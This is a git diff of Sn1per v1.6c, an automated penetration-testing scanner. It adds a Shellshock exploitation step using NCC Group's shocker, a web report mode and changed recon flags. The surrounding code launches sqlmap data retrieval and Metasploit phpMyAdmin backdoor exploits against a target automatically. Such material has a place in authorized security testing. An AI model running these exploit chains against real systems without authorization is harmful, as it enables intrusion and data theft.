diff --git a/README.md b/README.md index be0981d8..f6b488d7 100644 --- a/README.md +++ b/README.md @@ -25,7 +25,7 @@ Sn1per is an automated scanner that can be used during a penetration test to enu # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -46,6 +46,9 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6c - Add report mode for web scans +* v1.6c - Fixed issues with Sublist3r and theharvester +* v1.6c - Added Shocker Shellshock exploitation scanner * v1.6b - Added Sublist3r sub-domain brute tool * v1.6b - Added cutycapt web screenshot util * v1.6a - Added improvements to recon phase @@ -91,5 +94,4 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc * v1.4 - Removed debug output from goohak from displaying on console ## FUTURE: -* Add in OpenVAS integration * Look into HTML reporting options diff --git a/install.sh b/install.sh index 9fd03717..740f626b 100644 --- a/install.sh +++ b/install.sh @@ -31,7 +31,7 @@ gem install rake gem install ruby-nmap net-http-persistent mechanize text-table echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET" -rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ +rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET" git clone https://github.com/1N3/Findsploit.git @@ -44,6 +44,7 @@ git clone https://github.com/Dionach/CMSmap.git git clone https://github.com/0xsauby/yasuo.git git clone https://github.com/johndekroon/serializekiller.git git clone https://github.com/aboul3la/Sublist3r.git +git clone https://github.com/nccgroup/shocker.git echo -e "$OKORANGE + -- --=[Setting up environment...$RESET" mkdir loot 2> /dev/null diff --git a/loot/README.md b/loot/README.md index d6f590dd..f6b488d7 100644 --- a/loot/README.md +++ b/loot/README.md @@ -25,7 +25,7 @@ Sn1per is an automated scanner that can be used during a penetration test to enu # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -46,6 +46,11 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.6c - Add report mode for web scans +* v1.6c - Fixed issues with Sublist3r and theharvester +* v1.6c - Added Shocker Shellshock exploitation scanner +* v1.6b - Added Sublist3r sub-domain brute tool +* v1.6b - Added cutycapt web screenshot util * v1.6a - Added improvements to recon phase * v1.6a - Fixed small issue with 3rd party extension * v1.6a - Various improvements to overall optimization of scans @@ -89,5 +94,4 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc * v1.4 - Removed debug output from goohak from displaying on console ## FUTURE: -* Add in OpenVAS integration * Look into HTML reporting options diff --git a/sniper b/sniper index cb6deceb..5db39cff 100644 --- a/sniper +++ b/sniper @@ -23,7 +23,7 @@ # ./sniper # ./sniper stealth # ./sniper port -# ./sniper web +# ./sniper web # ./sniper nobrute # ./sniper airstrike # ./sniper nuke @@ -80,9 +80,16 @@ if [ "$MODE" = "report" ]; then exit fi +if [ "$MODE" = "web" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi +fi + if [ "$MODE" = "stealth" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -132,13 +139,13 @@ if [ "$MODE" = "stealth" ]; then then dig -x $TARGET whois $TARGET - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $TARGET dnsrecon -d $TARGET -t zonewalk dnsrecon -d $TARGET -t axfr dnsenum $TARGET -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" @@ -153,7 +160,7 @@ fi if [ "$MODE" = "airstrike" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" @@ -199,13 +206,13 @@ if [ "$MODE" = "airstrike" ]; then then dig -x $a whois $a - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $a dnsrecon -d $a -t zonewalk dnsrecon -d $a -t axfr dnsenum $a -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Running passive scans #########################$RESET" @@ -238,7 +245,7 @@ fi if [ "$MODE" = "nuke" ]; then if [ "$OPT1" = "report" ]; then - ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi for a in `cat $TARGET`; do @@ -278,13 +285,13 @@ if [ $SCAN_TYPE == "DOMAIN" ]; then dig -x $TARGET whois $TARGET - theharvester -d $TARGET -l 200 -b all -v -n -t 2> /dev/null + theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null dnsrecon -d $TARGET dnsrecon -d $TARGET -t zonewalk dnsrecon -d $TARGET -t axfr dnsenum $TARGET -f BruteX/wordlists/namelist.txt mv -f *_ips.txt loot/ 2>/dev/null - python Sublist3r/sublist3r.py -d $TARGET -b -t 30 2>/dev/null + python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null fi echo "" echo -e "$OKGREEN################################### Pinging host ###################################$RESET" @@ -294,6 +301,8 @@ echo -e "$OKGREEN################################### Running port scan ######### if [ -z "$OPT1" ]; then nmap -sS -sV -T4 -A -O -p 1-65535 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 --open $TARGET +elif [ "$OPT1" == "web" ]; then + nmap -sS -sV -T4 -A -O -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-web-$TARGET.xml else nmap -sS -sV -T4 -A -O -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml nmap -sU -sV -T4 -A -O -p U:$OPT1 --open $TARGET @@ -477,6 +486,7 @@ else arachni http://$TARGET --output-only-positives sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80 fi fi @@ -619,6 +629,7 @@ else arachni https://$TARGET --output-only-positives sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" + python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl fi fi